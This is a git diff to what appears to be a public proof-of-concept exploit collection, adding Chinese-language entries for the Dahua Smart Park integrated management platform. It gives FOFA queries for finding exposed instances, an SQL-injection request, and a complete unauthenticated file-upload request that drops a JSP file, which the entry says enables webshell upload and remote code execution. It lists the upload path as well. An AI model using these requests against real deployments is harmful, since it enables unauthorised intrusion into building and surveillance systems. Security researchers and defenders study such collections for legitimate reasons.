大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞

README.md

@@ -9,6 +9,10 @@
   <img src="https://contrib.rocks/image?repo=wy876/POC" />
 </a>
 
+## 2024.10.13 新增漏洞
+
+- [大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞](./大华/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md)
+
 ## 2024.10.07 新增漏洞
 
 - [泛微E-Mobile硬编码口令漏洞(XVE-2024-28095)](./泛微OA/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md)

大华/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md

@@ -1,4 +1,13 @@
 ## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
 ```
 GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
 Host: 127.0.0.1:7443

大华/大华智慧园区综合管理平台 文件上传漏洞.md

@@ -1,4 +1,13 @@
 ## 大华智慧园区综合管理平台 文件上传漏洞
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
 ```
 POST /publishing/publishing/material/file/video HTTP/1.1
 Host: 127.0.0.1:7443

大华/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md

@@ -0,0 +1,33 @@
+# 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞
+
+大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞，未经授权的攻击者可以上传恶意Webshell的JSP文件，可以进行RCE利用。
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
+```javascript
+POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
+Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
+User-Agent: Java/1.8.0_345
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 229
+Connection: close
+
+--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
+Content-Disposition: form-data; name="upload"; filename="1.jsp"
+Content-Type: application/octet-stream
+Content-Transfer-Encoding: binary
+
+123456
+--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
+```
+
+![image-20241008142600054](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410081426265.png)
+
+文件路径 `http://ip:port/upload/emap/society_new/`+文件名